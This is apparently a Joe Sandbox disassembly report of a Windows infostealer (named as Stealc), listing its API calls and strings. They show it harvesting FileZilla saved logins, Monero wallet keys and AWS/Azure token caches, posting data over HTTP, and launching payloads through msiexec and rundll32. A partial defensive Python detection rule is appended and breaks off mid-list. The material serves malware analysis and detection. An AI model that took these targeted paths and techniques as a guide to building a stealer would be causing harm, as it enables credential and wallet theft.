                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004C0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 004C0571
                              • lstrcat.KERNEL32(?,url: ), ref: 004C0580
                              • lstrcat.KERNEL32(?,00000000), ref: 004C0593
                              • lstrcat.KERNEL32(?,004D1678), ref: 004C05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 004C05B5
                              • lstrcat.KERNEL32(?,004D167C), ref: 004C05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 004C05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 004C05E6
                              • lstrcat.KERNEL32(?,004D1688), ref: 004C05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 004C0604
                              • lstrcat.KERNEL32(?,00000000), ref: 004C0617
                              • lstrcat.KERNEL32(?,004D1698), ref: 004C0626
                              • lstrcat.KERNEL32(?,004D169C), ref: 004C0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004D0DB2), ref: 004C068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 111f9c649efe7d23c582fb10776b3eb9916d53b55fe3f7320a670adbd1a0d712
                              • Instruction ID: 5de3986f69dff43bcae35525e14d23c13b52f5c7c9fef772397ae5c7dbe28170
                              • Opcode Fuzzy Hash: 111f9c649efe7d23c582fb10776b3eb9916d53b55fe3f7320a670adbd1a0d712
                              • Instruction Fuzzy Hash: 5ED14CB9900108ABCB44FBE1DD96FFE7339AF14308F50441EF506A6191DE78AA16CB79
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004B59F8
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0118E130,00000000,?,0118CF58,00000000,?,004D1A1C), ref: 004B5E71
                              • lstrlen.KERNEL32(00000000), ref: 004B5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004B5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B5E9A
                              • lstrlen.KERNEL32(00000000), ref: 004B5EAF
                              • lstrlen.KERNEL32(00000000), ref: 004B5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004B5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 004B5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004B5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004B5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 004B5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 004B5FBD
                              • HttpOpenRequestA.WININET(00000000,0118E1D0,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B5BF8
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • InternetCloseHandle.WININET(00000000), ref: 004B5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: bc23d0f25fed1d36fdcdf6bfe2233dd11631e700c52dcece8a7dcd33df3f3b68
                              • Instruction ID: edf0e51cb193f6c12c0a46a424085579a5c770030724131644cde95056e51393
                              • Opcode Fuzzy Hash: bc23d0f25fed1d36fdcdf6bfe2233dd11631e700c52dcece8a7dcd33df3f3b68
                              • Instruction Fuzzy Hash: 1A121E7582011CABCB54FBA1DC96FEEB378BF14708F5001AEB10662091DF782E59CB69
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004BD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004BD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD208
                              • lstrcat.KERNEL32(?,004D1478), ref: 004BD217
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD22A
                              • lstrcat.KERNEL32(?,004D147C), ref: 004BD239
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD24C
                              • lstrcat.KERNEL32(?,004D1480), ref: 004BD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD26E
                              • lstrcat.KERNEL32(?,004D1484), ref: 004BD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD290
                              • lstrcat.KERNEL32(?,004D1488), ref: 004BD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD2B2
                              • lstrcat.KERNEL32(?,004D148C), ref: 004BD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 004BD2D4
                              • lstrcat.KERNEL32(?,004D1490), ref: 004BD2E3
                                • Part of subcall function 004CA820: lstrlen.KERNEL32(004B4F05,?,?,004B4F05,004D0DDE), ref: 004CA82B
                                • Part of subcall function 004CA820: lstrcpy.KERNEL32(004D0DDE,00000000), ref: 004CA885
                              • lstrlen.KERNEL32(?), ref: 004BD32A
                              • lstrlen.KERNEL32(?), ref: 004BD339
                                • Part of subcall function 004CAA70: StrCmpCA.SHLWAPI(011889C8,004BA7A7,?,004BA7A7,011889C8), ref: 004CAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 004BD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 94219fea91ad6dc0f50586693aa0e03c1019733d13101b4c60fd6c658cf56cc0
                              • Instruction ID: 3d89b0d5a5563523ac76c1ea027694c93f070c47a1e870002406806b8758f27e
                              • Opcode Fuzzy Hash: 94219fea91ad6dc0f50586693aa0e03c1019733d13101b4c60fd6c658cf56cc0
                              • Instruction Fuzzy Hash: CBE16FB5900108ABCB44FBA1DD96FEE7379BF14308F10415EF106A6091DE39AE15CB7A
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0118C678,00000000,?,004D144C,00000000,?,?), ref: 004BCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004BCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004BCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004BCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004BCAD9
                              • StrStrA.SHLWAPI(?,0118C6A8,004D0B52), ref: 004BCAF7
                              • StrStrA.SHLWAPI(00000000,0118C6F0), ref: 004BCB1E
                              • StrStrA.SHLWAPI(?,0118D0C0,00000000,?,004D1458,00000000,?,00000000,00000000,?,01188AD8,00000000,?,004D1454,00000000,?), ref: 004BCCA2
                              • StrStrA.SHLWAPI(00000000,0118D080), ref: 004BCCB9
                                • Part of subcall function 004BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004BC871
                                • Part of subcall function 004BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004BC87C
                              • StrStrA.SHLWAPI(?,0118D080,00000000,?,004D145C,00000000,?,00000000,01188A68), ref: 004BCD5A
                              • StrStrA.SHLWAPI(00000000,01188928), ref: 004BCD71
                                • Part of subcall function 004BC820: lstrcat.KERNEL32(?,004D0B46), ref: 004BC943
                                • Part of subcall function 004BC820: lstrcat.KERNEL32(?,004D0B47), ref: 004BC957
                                • Part of subcall function 004BC820: lstrcat.KERNEL32(?,004D0B4E), ref: 004BC978
                              • lstrlen.KERNEL32(00000000), ref: 004BCE44
                              • CloseHandle.KERNEL32(00000000), ref: 004BCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: d3f19a5f0eaedc8f1a96481e6ef07d92e930e86494d2fa419077e23a565e53a1
                              • Instruction ID: 06764b274944f281b3557f9bf6177562dde084d4ffda7741d91c2a8c2fb68661
                              • Opcode Fuzzy Hash: d3f19a5f0eaedc8f1a96481e6ef07d92e930e86494d2fa419077e23a565e53a1
                              • Instruction Fuzzy Hash: 21E11EB580010CABDB54FBA1DC96FEEB779AF14308F00416EF10666191DF386A5ACB79
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • RegOpenKeyExA.ADVAPI32(00000000,0118A480,00000000,00020019,00000000,004D05B6), ref: 004C83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004C8426
                              • wsprintfA.USER32 ref: 004C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C8499
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 1d1e7278f4e4bb5d4078ce02c9231ab914da44614f115edcc30d49cba1dbc78f
                              • Instruction ID: ba4f851aaef4e10426699d478aa2cf2717d47d24bab009183e5d84081d555275
                              • Opcode Fuzzy Hash: 1d1e7278f4e4bb5d4078ce02c9231ab914da44614f115edcc30d49cba1dbc78f
                              • Instruction Fuzzy Hash: A6811CB591011CABDB64EB50CC95FEAB7B9BF08704F00829EE109A6140DF756F85CFA9
                              APIs
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 004C4DCD
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C492C
                                • Part of subcall function 004C4910: FindFirstFileA.KERNEL32(?,?), ref: 004C4943
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 004C4E59
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
                                • Part of subcall function 004C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
                                • Part of subcall function 004C4910: FindClose.KERNEL32(000000FF), ref: 004C4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004C4EE5
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C49B0
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D08D2), ref: 004C49C5
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C49E2
                                • Part of subcall function 004C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 004C4A1E
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,0118E200), ref: 004C4A4A
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,004D0FF8), ref: 004C4A5C
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,?), ref: 004C4A70
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,004D0FFC), ref: 004C4A82
                                • Part of subcall function 004C4910: lstrcat.KERNEL32(?,?), ref: 004C4A96
                                • Part of subcall function 004C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 004C4AAC
                                • Part of subcall function 004C4910: DeleteFileA.KERNEL32(?), ref: 004C4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 45a37f2976407bdbe119e1bcd4e40ba3d62cfcb1ca8e386aa23c0f6f03aec42a
                              • Instruction ID: 60ebc0d9ea36362b4e1153fea6aa0a88a25b3c2128bc25bf30b0596f67ee6d7a
                              • Opcode Fuzzy Hash: 45a37f2976407bdbe119e1bcd4e40ba3d62cfcb1ca8e386aa23c0f6f03aec42a
                              • Instruction Fuzzy Hash: 3441A5BAA4020867CB50F770DC57FED3338AB64704F40445EB549A61C1EDB85BC9CBA6
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004C906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                               • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 3479b8d846b803ef33986b1032d874ee08433b1b37f242366c2bb905e666c03e
                              • Instruction ID: c8c2aea1bfca50916eda1198c0e2e0c7daae958cb8eb119da455e78cde3af2be
                              • Opcode Fuzzy Hash: 3479b8d846b803ef33986b1032d874ee08433b1b37f242366c2bb905e666c03e
                              • Instruction Fuzzy Hash: 297121B5900208ABDB04EFE4DC99FEEB7B9BF48700F10850DF519A7290DB78A905CB65
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 6ae163a2eb63dc6de8eda7f9290547a103be14387be53d5e16af3b419ebd918d
                              • Instruction ID: 2946ab36106aef8bf8295f24c86acbb23e93b75a204d5d16e120adab7d9853ee
                              • Opcode Fuzzy Hash: 6ae163a2eb63dc6de8eda7f9290547a103be14387be53d5e16af3b419ebd918d
                              • Instruction Fuzzy Hash: DB12207980010C9BDB54FBA1DC92FEDB738AF14308F50416EE10666191EF782B5ACF6A
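The three ShellExecuteEx calls in this entry, read with the referenced strings `/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe` and `C:\Windows\system32\rundll32.exe`, show the sample handing a package to msiexec as `/i "<file>.msi" /passive` or a DLL to rundll32 (the `0000003C` argument is the 60-byte `cbSize` of a 32-bit `SHELLEXECUTEINFOA`). The detection logic below is an added example for this report, not Joe Sandbox or Stealc code: the process-creation record shape (Sysmon Event ID 1 style `image`, `parent_image`, `command_line`), the `TRUSTED_ROOTS` list and the sample records are this example's assumptions, constructed rather than taken from the sandbox run.

```python
"""Flag the payload-execution pattern this function exposes: ShellExecuteEx starting
msiexec.exe with '/i "<pkg>.msi" /passive' or rundll32.exe with '<file>.dll', evaluated
over process-creation records. Added example for this report, not Joe Sandbox or Stealc
code; record shape (Sysmon Event ID 1 style) and TRUSTED_ROOTS are assumptions."""
import re
from typing import Optional

# Locations from which an msiexec package or rundll32 DLL is considered expected.
# Assumption of this example; tune to the estate being monitored.
TRUSTED_ROOTS = (
    "c:\\windows\\installer\\", "c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
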